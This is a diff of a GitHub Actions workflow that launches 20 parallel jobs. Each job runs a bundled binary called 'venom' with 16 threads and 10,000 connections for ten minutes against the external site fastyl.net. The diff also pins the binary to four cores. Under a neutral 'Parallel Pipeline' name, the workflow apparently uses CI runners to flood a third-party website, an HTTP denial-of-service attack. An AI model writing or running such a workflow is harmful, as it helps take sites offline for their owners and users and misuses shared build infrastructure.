--- a/.github/workflows/main.yml
+++ b/.github/workflows/main.yml
@@ -1,4 +1,4 @@
-name: Parallel Pipeline with 4-Core VM
+name: Parallel Pipeline
 
 on:
   workflow_dispatch:
@@ -9,7 +9,7 @@ permissions:
 
 jobs:
   parallel-job:
-    runs-on: ubuntu-latest-4-cores
+    runs-on: ubuntu-latest
     strategy:
       matrix:
         job-number: [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]
@@ -17,9 +17,12 @@ jobs:
       - name: Checkout repository
         uses: actions/checkout@v3
 
-      - name: Make venom executable and run
+      - name: Install taskset
+        run: sudo apt-get update && sudo apt-get install -y util-linux
+
+      - name: Make venom executable and run on 4 cores
         run: |
-          chmod +x ./venom 
-          nproc 
-          ./venom -t16 -c10000 -d10m https://fastyl.net/
-        shell: /usr/bin/bash -e {0}
+          chmod +x ./venom
+          echo "Number of cores available:"
+          nproc
+          taskset -c 0-3 ./venom -t16 -c10000 -d10m https://fastyl.net/
